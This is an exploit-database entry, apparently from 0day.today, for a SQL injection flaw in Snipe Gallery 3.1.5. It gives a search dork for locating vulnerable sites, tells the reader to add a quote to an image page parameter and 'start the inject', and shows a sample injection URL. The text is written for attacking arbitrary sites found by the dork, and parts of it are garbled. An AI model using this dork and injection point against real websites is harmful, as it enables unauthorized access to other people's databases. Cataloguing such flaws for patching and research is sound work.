[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

snipe gallery Script Sql Injection Vulnerability

Author
dev!l ghost
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12948
Category
web applications
Date add
25-06-2010
Platform
php
================================================
snipe gallery Script Sql Injection Vulnerability
================================================


# Exploit Title:   snipe gallery Script Sql Injection
# Date: 26/06/2010
# Author: dev!l ghost
# Email: aws(at)live(dot)it
# Site : www.h00forall.com
# Script url: http://sourceforge.net/projects/snipegallery/
# Version: 3.1.5
# Tested on: Windows
# CVE : ()
   
:::::::::::::::::::::::::
   
   
=================Exploit=================
DorK:(Snipe Gallery v.3.1.5 by Snipe.Net)
 
When You search with the dork you will find a lot of sites ,,enter
site and you will find a lot of pictures enter any picture and
the pot the(')and start the inject
 
the inject is very easy
 
 
 
----exploit----  
 
{{DeMo}}
http://www.example.com/snipe/image.php?page=1&search_type=and?_id=78(SQLI)
 
---------greatz----------
Greatz to all my frinds and the all muslims
and Volc4n0 and Golden Ice and mr.ip
and the all



#  0day.today [2024-12-24]  #